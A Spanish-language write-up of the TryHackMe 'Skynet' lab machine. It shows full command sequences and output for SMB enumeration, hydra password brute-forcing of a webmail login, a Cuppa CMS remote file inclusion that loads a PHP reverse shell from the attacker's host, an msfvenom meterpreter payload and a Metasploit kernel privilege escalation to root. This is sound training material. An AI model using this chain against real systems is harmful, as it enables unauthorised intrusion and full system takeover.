Skynet [TryHackMe]
2023-09-02
Introducción
Me enfrento a la primera máquina de “Offensive Pentesting” que no tiene sugerencias de que ir haciendo. En este caso, se trata de una máquina de nivel fácil, por lo que no debería ser muy complicada aún sin las recomendaciones que proporcionaban las anteriores salas. El objetivo es obtener acceso a la máquina y obtener la flag del usuario y la flag del root.
Task 1 - Deploy and compromise the vulnerable machine!
Paso 1
- Pongo la máquina en marcha y accedo a la aplicación web que tiene.
- Escaneo la máquina con un nmap en 2 pasos.
sudo nmap -sS --min-rate 5000 -p- -Pn -v -oN nmap_inicial <IP>
ports=$(cat nmap_inicial | grep '^[0-9]' | cut -d '/' -f1 | xargs | tr ' ' ',')
sudo nmap -p$ports -sC -sV -Pn -oN nmap_final <IP>
- Puertos de SSH, servidor web Apache, servidores de correo y Samba. Sistema operativo Linux Ubuntu.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE PIPELINING SASL CAPA UIDL TOP RESP-CODES
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: more LOGIN-REFERRALS post-login LITERAL+ have Pre-login capabilities IDLE LOGINDISABLEDA0001 IMAP4rev1 SASL-IR listed ENABLE OK ID
445/tcp open @NnU Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Paso 2
- Enumero Samab con Enum4Linux y lo guardo en un fichero
enum4linux -a 10.10.126.64 > samba_details
- Reviso los resultados.
===================================( OS information on 10.10.126.64 )===================================
46 │
47 │
48 │ [E] Can't get OS info with smbclient
49 │
50 │
51 │ [+] Got OS info for 10.10.126.64 from srvinfo:
52 │ SKYNET Wk Sv PrQ Unx NT SNT skynet server (Samba, Ubuntu)
53 │ platform_id : 500
54 │ os version : 6.1
55 │ server type : 0x809a03
56 │
57 │
58 │ =======================================( Users on 10.10.126.64 )=======================================
59 │
60 │ index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: milesdyson Name: Desc:
61 │
62 │ user:[milesdyson] rid:[0x3e8]
63 │
64 │ =================================( Share Enumeration on 10.10.126.64 )=================================
65 │
66 │
67 │ Sharename Type Comment
68 │ --------- ---- -------
69 │ print$ Disk Printer Drivers
70 │ anonymous Disk Skynet Anonymous Share
71 │ milesdyson Disk Miles Dyson Personal Share
72 │ IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
73 │ Reconnecting with SMB1 for workgroup listing.
74 │
75 │ Server Comment
76 │ --------- -------
77 │
78 │ Workgroup Master
79 │ --------- -------
80 │ WORKGROUP SKYNET
- Acceso anonymous user con smbclient.
❯ smbclient //10.10.126.64/anonymous
Password for [WORKGROUP\k3ss]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 26 17:04:00 2020
.. D 0 Tue Sep 17 09:20:17 2019
attention.txt N 163 Wed Sep 18 05:04:59 2019
logs D 0 Wed Sep 18 06:42:16 2019
9204224 blocks of size 1024. 5831500 blocks available
smb: \> get attention.txt
getting file \attention.txt of size 163 as attention.txt (1,0 KiloBytes/sec) (average 1,0 KiloBytes/sec)
NT_STATUS_OBJECT_NAME_INVALID opening remote file \logs\*
smb: \> get logs\log
logs\log1.txt logs\log2.txt logs\log3.txt
smb: \> get logs\log
logs\log1.txt logs\log2.txt logs\log3.txt
smb: \> get logs\log1.txt
getting file \logs\log1.txt of size 471 as logs\log1.txt (3,1 KiloBytes/sec) (average 2,1 KiloBytes/sec)
smb: \> get logs\log2.txt
getting file \logs\log2.txt of size 0 as logs\log2.txt (0,0 KiloBytes/sec) (average 1,5 KiloBytes/sec)
smb: \> get logs\log3.txt
getting file \logs\log3.txt of size 0 as logs\log3.txt (0,0 KiloBytes/sec) (average 1,2 KiloBytes/sec)
Paso 3
- Enumero los directorios que haya en la web con dirb
❯ dirb http://10.10.126.64/ /usr/share/wordlists/dirb/common.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Sep 2 11:57:08 2023
URL_BASE: http://10.10.126.64/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.126.64/ ----
==> DIRECTORY: http://10.10.126.64/admin/
==> DIRECTORY: http://10.10.126.64/config/
==> DIRECTORY: http://10.10.126.64/css/
+ http://10.10.126.64/index.html (CODE:200|SIZE:523)
==> DIRECTORY: http://10.10.126.64/js/
+ http://10.10.126.64/server-status (CODE:403|SIZE:277)
==> DIRECTORY: http://10.10.126.64/squirrelmail/
- En squirrelmail hay un login, guardo el post request en un fichero
POST /squirrelmail/src/redirect.php HTTP/1.1
Host: 10.10.126.64
Content-Length: 81
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.126.64
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.126.64/squirrelmail/src/login.php
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,es;q=0.9
Cookie: SQMSESSID=tn1nf3uvf4cm77sboeo2ssshg0
Connection: close
login_username=mylesdyson&secretkey=test&js_autodetect_results=1&just_logged_in=1
- Uso burp intruder y tambien hydra para probar todas las contraseñas (se puede usar cualquiera de los dos métodos).
❯ hydra -l milesdyson -P /home/k3ss/Documentos/tryhackme/skynet/nmap/log1.txt 10.10.126.64 http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Login failed" -V -t 4
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-02 12:27:55
[DATA] max 4 tasks per 1 server, overall 4 tasks, 31 login tries (l:1/p:31), ~8 tries per task
[DATA] attacking http-post-form://10.10.126.64:80/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Login failed
[ATTEMPT] target 10.10.126.64 - login "milesdyson" - pass "cyborg007haloterminator" - 1 of 31 [child 0] (0/0)
[ATTEMPT] target 10.10.126.64 - login "milesdyson" - pass "terminator22596" - 2 of 31 [child 1] (0/0)
[ATTEMPT] target 10.10.126.64 - login "milesdyson" - pass "terminator219" - 3 of 31 [child 2] (0/0)
[ATTEMPT] target 10.10.126.64 - login "milesdyson" - pass "terminator20" - 4 of 31 [child 3] (0/0)
[80][http-post-form] host: 10.10.126.64 login: milesdyson password: cyborg007haloterminator
[80][http-post-form] host: 10.10.126.64 login: milesdyson password: terminator22596
[80][http-post-form] host: 10.10.126.64 login: milesdyson password: terminator219
[80][http-post-form] host: 10.10.126.64 login: milesdyson password: terminator20
1 of 1 target successfully completed, 4 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-09-02 12:27:55
- Reviso el correo y encuentro que se ha cambiado la contraseña de SMB
Subject: Samba Password reset
From: skynet@skynet
Date: Tue, September 17, 2019 10:10 pm
Priority: Normal
Options: View Full Header | View Printable Version | Download this as a file
We have changed your smb password after system malfunction.
Password: )s{A&2Z=F^n_E.B`
- Accedo con smbclient y descargo todo.
❯ smbclient //10.10.126.64/milesdyson -U milesdyson -c "recurse; mget *"
- Reviso ficheros y encuentro uo llamado important.txt
❯ cat important.txt
───────┬────────────────────────────────────────────────────
│ File: important.txt
───────┼────────────────────────────────────────────────────
1 │
2 │ 1. Add features to beta CMS /45kra24zxs28v3yd
3 │ 2. Work on T-800 Model 101 blueprints
4 │ 3. Spend more time with my wife
───────┴────────────────────────────────────────────────────
- Accedo al CMS http://10.10.126.64/45kra24zxs28v3yd/
- Escaneo la URL con dirby y encuentro que aloja Cuppa CMS
❯ dirb http://10.10.126.64/45kra24zxs28v3yd /usr/share/wordlists/dirb/common.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Sep 2 12:48:28 2023
URL_BASE: http://10.10.126.64/45kra24zxs28v3yd/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.126.64/45kra24zxs28v3yd/ ----
==> DIRECTORY: http://10.10.126.64/45kra24zxs28v3yd/administrator/
Paso 4
- Busco exploits conocidos.
❯ searchsploit cuppa -w
-------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------
Exploit Title | URL
-------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion | https://www.exploit-db.com/exploits/25971
-------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------
Shellcodes: No Results
- El codigo permite incluir archivos PHP locales o remotos o leer archivos que no sean PHP con esta vulnerabilidad. Busco un reverse shell con php para usarlo.
❯ find /usr/share -iname "php-reverse-shell.php" 2>/dev/null
/usr/share/laudanum/php/php-reverse-shell.php
/usr/share/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/webshells/php/php-reverse-shell.php
- Uso el exploit para cargar el fichero php en el objetivo despues de haber creado un listener.
http://10.10.126.64/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.x.x.x/php-reverse-shell.php
Paso 5
- Conexión reverse shell
❯ rlwrap nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.x.x.x] from (UNKNOWN) [10.10.126.64] 43474
Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
06:02:14 up 2:06, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
- Estabilizo shell y busco flag del usuario.
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@skynet:/$ cd
cd
bash: cd: HOME not set
www-data@skynet:/$ ls
ls
bin home lib64 opt sbin tmp vmlinuz.old
boot initrd.img lost+found proc snap usr
dev initrd.img.old media root srv var
etc lib mnt run sys vmlinuz
www-data@skynet:/$ cd home
cd home
www-data@skynet:/home$ ls
ls
milesdyson
www-data@skynet:/home$ cd milesdyson
cd milesdyson
www-data@skynet:/home/milesdyson$ ls
ls
backups mail share user.txt
www-data@skynet:/home/milesdyson$ cat user.txt
cat user.txt
7ce5c2109a40f958099283600a9ae807
Paso 6
- Creo un payload con msfvenom para obtener acceso con meterpreter y lo subo con wget
❯ msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf -o shell LHOST=10.x.x.x LPORT=4444
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes
Saved as: shell
- En metasploit ejecuto:
msf6 > use linux/x64/meterpreter/reverse_tcp
msf6 payload(linux/x64/meterpreter/reverse_tcp) > set LHOST tun0
msf6 payload(linux/x64/meterpreter/reverse_tcp) > exploit
[*] Payload Handler Started as Job 0
msf6 payload(linux/x64/meterpreter/reverse_tcp) >
[*] Started reverse TCP handler on 10.x.x.x:4444
[*] Sending stage (3045380 bytes) to 10.10.126.64
[*] Meterpreter session 1 opened (10.x.x.x:4444 -> 10.10.126.64:33592) at 2023-09-02 13:27:55 +0200
meterpreter > sysinfo
Computer : 10.10.126.64
OS : Ubuntu 16.04 (Linux 4.8.0-58-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
- Ejecuto el exploit suggeter de metasploit.
meterpreter > run post/multi/recon/local_exploit_suggester
[*] 10.10.126.64 - Collecting local exploits for x64/linux...
[*] 10.10.126.64 - 186 exploit checks are being tried...
[+] 10.10.126.64 - exploit/linux/local/bpf_sign_extension_priv_esc: The target appears to be vulnerable.
[+] 10.10.126.64 - exploit/linux/local/cve_2021_3493_overlayfs: The target appears to be vulnerable.
[+] 10.10.126.64 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 10.10.126.64 - exploit/linux/local/cve_2022_0995_watch_queue: The target appears to be vulnerable.
[+] 10.10.126.64 - exploit/linux/local/glibc_realpath_priv_esc: The target appears to be vulnerable.
[+] 10.10.126.64 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 10.10.126.64 - exploit/linux/local/ptrace_traceme_pkexec_helper: The target appears to be vulnerable.
[+] 10.10.126.64 - exploit/linux/local/su_login: The target appears to be vulnerable.
[+] 10.10.126.64 - exploit/linux/local/sudo_baron_samedit: The target appears to be vulnerable. sudo 1.8.16 is a vulnerable build.
[+] 10.10.126.64 - exploit/linux/local/ufo_privilege_escalation: The target appears to be vulnerable.
[*] Running check method for exploit 63 / 63
[*] 10.10.126.64 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/linux/local/bpf_sign_extension_priv_esc Yes The target appears to be vulnerable.
2 exploit/linux/local/cve_2021_3493_overlayfs Yes The target appears to be vulnerable.
3 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable.
4 exploit/linux/local/cve_2022_0995_watch_queue Yes The target appears to be vulnerable.
5 exploit/linux/local/glibc_realpath_priv_esc Yes The target appears to be vulnerable.
6 exploit/linux/local/pkexec Yes The service is running, but could not be validated.
7 exploit/linux/local/ptrace_traceme_pkexec_helper Yes The target appears to be vulnerable.
8 exploit/linux/local/su_login Yes The target appears to be vulnerable.
9 exploit/linux/local/sudo_baron_samedit Yes The target appears to be vulnerable. sudo 1.8.16 is a vulnerable build.
10 exploit/linux/local/ufo_privilege_escalation Yes The target appears to be vulnerable.
- Uso el exploit
exploit/linux/local/bpf_sign_extension_priv_eschttps://www.rapid7.com/db/modules/exploit/linux/local/bpf_sign_extension_priv_esc/
msf6 payload(linux/x64/meterpreter/reverse_tcp) > use exploit/linux/local/bpf_sign_extension_priv_esc
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > set LHOST tun0
LHOST => tun0
Module options (exploit/linux/local/bpf_sign_extension_priv_esc):
Name Current Setting Required Description
---- --------------- -------- -----------
COMPILE Auto yes Compile on target (Accepted: Auto, True, False)
SESSION yes The session to run this module on
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST tun0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Auto
View the full module info with the info, or info -d command.
msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > run
[-] Handler failed to bind to 10.x.x.x4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Writing '/tmp/.UoAQEHbf' (250 bytes) ...
[*] Launching exploit ...
[*] Sending stage (3045380 bytes) to 10.10.126.64
[*] Cleaning up /tmp/.UoAQEHbf and /tmp/.cVeXOTD6D ...
[*] Meterpreter session 2 opened (10.x.x.x:4444 -> 10.10.126.64:33600) at 2023-09-02 13:36:02 +0200
[*] Exploit completed, but no session was created.
msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > sessions 2
[*] Starting interaction with 2...
meterpreter > getuid
Server username: root
- Una vez obtengo acceso como root, busco la bandera.
meterpreter > cd /root
meterpreter > ls
Listing: /root
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
020666/rw-rw-rw- 0 cha 2023-09-02 10:55:49 +0200 .bash_history
100644/rw-r--r-- 3106 fil 2015-10-22 19:15:21 +0200 .bashrc
040700/rwx------ 4096 dir 2019-09-18 00:35:40 +0200 .cache
040755/rwxr-xr-x 4096 dir 2019-09-17 09:32:06 +0200 .nano
100644/rw-r--r-- 148 fil 2015-08-17 17:30:33 +0200 .profile
100644/rw-r--r-- 33 fil 2019-09-18 05:41:47 +0200 root.txt
meterpreter > cat root.txt
3f0372db24753accc7179a282cd6a949
Conclusion
Al no tener esa especie de guía que tenían las anteriores salas, he tenido que investigar un poco más de lo habitual. Aún así, la máquina es bastante sencilla y no he tenido problemas para resolverla. Sigue el mismo patrón que las máquinas de TryHackMe: enumeración, explotación y escalada de privilegios. Con un poco de paciencia y ganas, se puede resolver sin problemas. Las herramientas que he usado son las habituales: nmap, enum4linux, dirb, burp, metasploit, hydra, smbclient, msfvenom, etc. Una máquina muy recomendable y entretenida con ambientación de Terminator.